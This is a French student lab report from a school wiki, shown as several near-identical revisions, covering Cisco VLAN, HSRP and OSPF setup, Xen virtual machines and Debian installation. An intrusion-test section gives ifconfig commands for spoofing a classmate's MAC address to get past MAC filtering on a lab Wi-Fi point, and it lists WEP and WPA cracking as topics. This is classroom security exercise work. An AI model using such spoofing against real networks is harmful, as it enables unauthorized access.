172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> <br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22935 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:25:15Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22932 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:14:38Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22931 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:14:02Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22930 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:07:44Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me 